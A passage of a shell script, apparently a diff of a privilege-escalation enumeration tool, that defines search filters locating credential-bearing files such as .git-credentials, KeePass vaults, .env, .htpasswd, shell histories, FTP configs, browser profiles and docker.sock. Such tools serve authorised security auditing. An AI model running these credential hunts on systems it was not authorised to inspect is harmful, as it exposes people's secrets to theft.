"$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -v -E 'README.gnupg' | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) + PSTORAGE_CACHE_VI=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) + PSTORAGE_DOCKER=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) + PSTORAGE_FIREFOX=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) + PSTORAGE_CHROME=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) + PSTORAGE_OPERA=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) + PSTORAGE_SAFARI=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) + PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) + PSTORAGE_FASTCGI=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) + PSTORAGE_SNMP=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PYPIRC=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\.pypirc$" | sort | uniq | head -n 70) + PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "postfix$" | sort | uniq | head -n 70) + PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) + PSTORAGE_HISTORY=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) + PSTORAGE_HTTP_CONF=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_HTPASSWD=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) + PSTORAGE_LDAPRC=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) + PSTORAGE_ENV=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\.env$" | sort | uniq | head -n 70) + PSTORAGE_MSMTPRC=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) + PSTORAGE_INFLUXDB=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ZABBIX=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) + PSTORAGE_GITHUB=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) + PSTORAGE_SVN=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\.svn$" | sort | uniq | head -n 70) + PSTORAGE_KEEPASS=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) + PSTORAGE_FTP=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) + PSTORAGE_BIND=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/etc|^/usr|^/var" | grep -E "bind$" | sort | uniq | head -n 70) + PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "seeddms.*$" | sort | uniq | head -n 70) + PSTORAGE_DDCLIENT=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KCPASSWORD=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "kcpassword$" | sort | uniq | head -n 70) + PSTORAGE_SENTRY=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) + PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "environments$" | sort | uniq | head -n 70) + PSTORAGE_CACTI=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "cacti$" | sort | uniq | head -n 70) + PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "roundcube$" | sort | uniq | head -n 70) + PSTORAGE_PASSBOLT=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) + PSTORAGE_JETTY=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70) + PSTORAGE_WGET=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) + PSTORAGE_INTERESTING_LOGS=$(echo -e 